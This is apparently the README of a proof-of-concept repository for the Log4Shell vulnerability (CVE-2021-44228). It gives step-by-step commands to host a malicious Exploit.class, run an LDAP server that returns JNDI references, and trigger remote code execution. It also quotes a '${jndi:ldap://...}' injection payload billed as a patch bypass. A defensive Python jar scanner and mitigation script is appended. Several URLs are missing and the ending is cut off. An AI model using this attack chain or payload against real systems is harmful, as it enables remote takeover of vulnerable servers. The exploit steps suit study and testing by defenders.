# CVE-2021-44228 (Apache Log4j Remote Code Execution)

> all log4j-core versions >=2.0-beta9 and <=2.14.1

Log4j 1.x has other vulnerabilities; updating to the latest version is recommended.

Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)

### Usage:

Download this project, compile the exploit code (under src/main/java/ in the repository), and start a web server so the compiled class can be downloaded.

```bash
git clone
cd CVE-2021-44228

# start webserver
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888

# make sure the python webserver is running in the same directory as Exploit.class, to test
curl -I
```

Download another project and run the *LDAP server implementation returning JNDI references*:

```bash
git clone
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer ""
```

Build and run the activation code (under src/main/java/ in the repository), which simulates a log4j attack on a vulnerable Java web server; the calculator app will appear.

```bash
cd CVE-2021-44228
mvn clean package
java -cp target/log4j-rce-1.0-SNAPSHOT-all.jar log4j

# Expect the following
# 1. calculator app appears
# 2. in ldapserver console,
#  Send LDAP reference result for Exploit redirecting to
# 3. in webserver console,
# - - [....] "GET /Exploit.class HTTP/1.1" 200 -
```


> Do not rely on a current Java version to save you. Update Log4j (or remove the JNDI lookup). Disable the expansion (seems a pretty bad idea anyways).
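
As an added defender-side example (not code from this repository), the following Python script inventories a jar for the log4j-core version range quoted at the top of this page and for the `JndiLookup` class, and applies the "remove the JNDI lookup" mitigation by rewriting the jar without that class. The jar it builds is a constructed stand-in for log4j-core, not a real artifact; the `pom.properties` and class entry names are the ones Maven-built log4j-core jars use.

```python
import io
import re
import zipfile

# Entry names as found in Maven-built log4j-core jars.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
VULN_LOW, VULN_HIGH = "2.0-beta9", "2.14.1"   # range quoted at the top of this page

def version_key(version):
    """Sort key so that 2.0-beta9 < 2.0-beta10 < 2.0 < 2.14.1 < 2.15.0."""
    base, _, pre = version.partition("-")
    nums = tuple(int(p) for p in base.split("."))
    if not pre:                       # final release sorts after its pre-releases
        return nums, 1, "", 0
    tag, num = re.match(r"([A-Za-z]*)(\d*)", pre).groups()
    return nums, 0, tag.lower(), int(num or 0)

def scan_jar(jar_bytes):
    """Return (log4j-core version or None, JndiLookup present?, version in vulnerable range?)."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        version = None
        if POM_PROPS in names:
            for line in jar.read(POM_PROPS).decode().splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    in_range = version is not None and \
        version_key(VULN_LOW) <= version_key(version) <= version_key(VULN_HIGH)
    return version, JNDI_LOOKUP in names, in_range

def strip_jndi_lookup(jar_bytes):
    """Rewrite the jar without JndiLookup.class (the 'remove the JNDI lookup' mitigation)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            if info.filename != JNDI_LOOKUP:
                dst.writestr(info, src.read(info.filename))
    return out.getvalue()

def make_sample_jar(version, with_lookup=True):
    """Constructed stand-in for a log4j-core jar (test input only, not a real artifact)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        if with_lookup:
            jar.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")   # class-file magic, nothing else
    return buf.getvalue()
```

Real deployments often bundle log4j-core inside war/ear files or shaded fat jars, so a production scanner must recurse into nested archives and look for relocated copies of the class. The version string alone is not decisive; whether `JndiLookup.class` is still present is what matters.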

### Bypass rc1
For example:

```
${jndi:ldap:// badClassName}
```

### Bypass WAF
> Don't trust the web application firewall.

### Details Of Vuln
Lookups provide a way to add values to the Log4j configuration at arbitrary places.


> The methods to cause leak in finally